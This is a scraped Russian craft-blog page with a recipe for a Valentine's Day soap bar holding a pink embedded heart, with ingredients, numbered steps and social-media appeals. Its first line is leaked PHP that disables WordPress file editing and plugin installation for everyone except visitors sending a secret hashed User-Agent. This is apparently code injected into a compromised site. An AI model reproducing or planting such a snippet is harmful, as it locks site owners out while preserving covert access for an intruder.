if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт мыла своими руками с сердечком на 14 февраля | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт мыла своими руками с сердечком на 14 февраля

Берегите свою любовь! Именно любовь двигает нас вперёд, даёт нам силы и способности творить и радоваться жизни :) Именно такие слова я сказала своему любимому на 14 февраля

Бере­ги­те свою любовь! Имен­но любовь дви­га­ет нас впе­рёд, даёт нам силы и спо­соб­но­сти тво­рить и радо­вать­ся жиз­ни 🙂 Имен­но такие сло­ва я ска­за­ла сво­е­му люби­мо­му на 14 фев­ра­ля, когда дела­ла ему пода­рок в виде мыла с сер­деч­ком на день свя­то­го Вален­ти­на. А как его сде­лать сво­и­ми рука­ми я вам сей­час расскажу!

Нам необ­хо­ди­мо иметь:

  • При­мер­но 70гр. про­зрач­ной осно­вы для мыла
  • Око­ло 30гр. белой осно­вы для мыла
  • розо­вый краситель,
  • Круг­лая или пря­мо­уголь­ная фор­ма на кусок мыла
  • малень­кая фор­ма — сердечка
  • кос­ме­ти­че­ские мика или блестки,
  • аро­ма­ти­за­тор,
  • дере­вян­ная палоч­ка меди­цин­ский спирт, миска.

Нач­нем при­го­тов­ле­ние по пунктам

  1. Рас­пла­вить белую осно­ву и добавь­те аро­ма­ти­за­то­ра 4–5 капе­лек, затем окрась­те розо­вым красителем.
    mas_serdce003_1
  2. Залей­те розо­вую осно­ву в не боль­шую фор­му серд­ца. Обрыз­ни­те спир­том и подо­жди­те, пока хоро­шо остынет.
    mas_serdce003_2
  3. Достань­те сер­деч­ко из формы
    mas_serdce003_3
  4. Затем необ­хо­ди­мо рас­пла­вить про­зрач­ную осно­ву и окра­сить её в розо­вый цвет. Далее аро­ма­ти­зи­руй­те этой же отдуш­кой (6–8 капе­лек). Затем добавь­те бле­сток и перемешайте.
    mas_serdce003_5
  5. В кон­це нуж­но акку­рат­но залить немнож­ко про­зрач­ной осно­вы в боль­шую фор­му, что­бы она слег­ка покры­ва­ла дно, сбрыз­нуть сер­деч­ко спир­том и осто­рож­но поло­жить его в фор­му “лицом” вниз.
    mas_serdce003_4

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!